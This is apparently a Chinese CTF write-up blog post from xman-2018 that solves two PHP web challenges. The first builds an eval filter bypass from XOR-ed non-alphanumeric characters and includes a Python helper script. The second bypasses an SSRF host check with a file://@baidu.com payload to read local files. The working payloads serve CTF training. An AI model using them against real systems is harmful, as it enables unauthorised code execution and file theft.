NEKO

xman-2018

2018/08/08

**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
include 'flag.php';
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>40){
die("Long.");
}
if(preg_match("/[A-Za-z0-9]+/",$code)){
die("NO.");
}
@eval($code);
}else{
highlight_file(__FILE__);
}
//$hint = "php function getFlag() to get flag";
?>

参考:https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html
这篇文章分析的很好,但有点小问题,比如payload可以简化写成:

1
?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag

也可以不使用$_GET,payload可以这样写:

1
?code=$_=%22%27%25%28%26%2c%21%27%22%5e%22%40%40%5c%60%40%40%40%22;$_();

url编码前:

1
?code=$_="'%(&,!'"^"@@\`@@@";$_();

其中

1
"'%(&,!'"^"@@\`@@@"="getFlag"

写个python脚本可以求得这些符号:

1
2
3
4
5
6
7
8
9
import string

dict=string.punctuation
s='getFlag'
for i in s:
for j in dict:
if chr(ord(i)^ord(j)) in dict:
print j+" ^ "+chr(ord(i)^ord(j))+" = "+i
break

结果为:

1
2
3
4
5
6
7
' ^ @ = g
% ^ @ = e
( ^ \ = t
& ^ ` = F
, ^ @ = l
! ^ @ = a
' ^ @ = g

此外本地测试了一下,payload:

1
?code=(%22%27%25%28%26%2c%21%27%22%5e%22%40%40%5c%60%40%40%40%22)();

也是可行的,但平台上此payload不管用,可能与php版本有关.

Simple-SSRF

天津营的一道题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

/*
* I stored flag.txt at baidu.com
*/

show_source(__FILE__);

if (isset($_GET['url'])) {
$url = parse_url($_GET['url']);
if (!$url) {
die('Can not parse url: ' . $_GET['url']);
}
if (substr($_GET['url'], strlen('http://'), strlen('baidu.com')) === 'baidu.com') {
die('Hey, papi, you have to bypass this!');
}
if (
$url['host'] === 'baidu.com'
) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_exec($ch);
curl_close($ch);
} else {
die('Save it, hacker!');
}
}

payload:

1
127.0.0.1/1234.php?url=file://@baidu.com/flag.txt

个人赛也有一道相似的ssrf,不过payload为:

1
file://@www.baidu.com/../../../../../../etc/flag.txt#

最后要加一个#号。

原文作者: n3k0

发表日期: August 8th 2018, 4:32:48

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. **
  2. 2. Simple-SSRF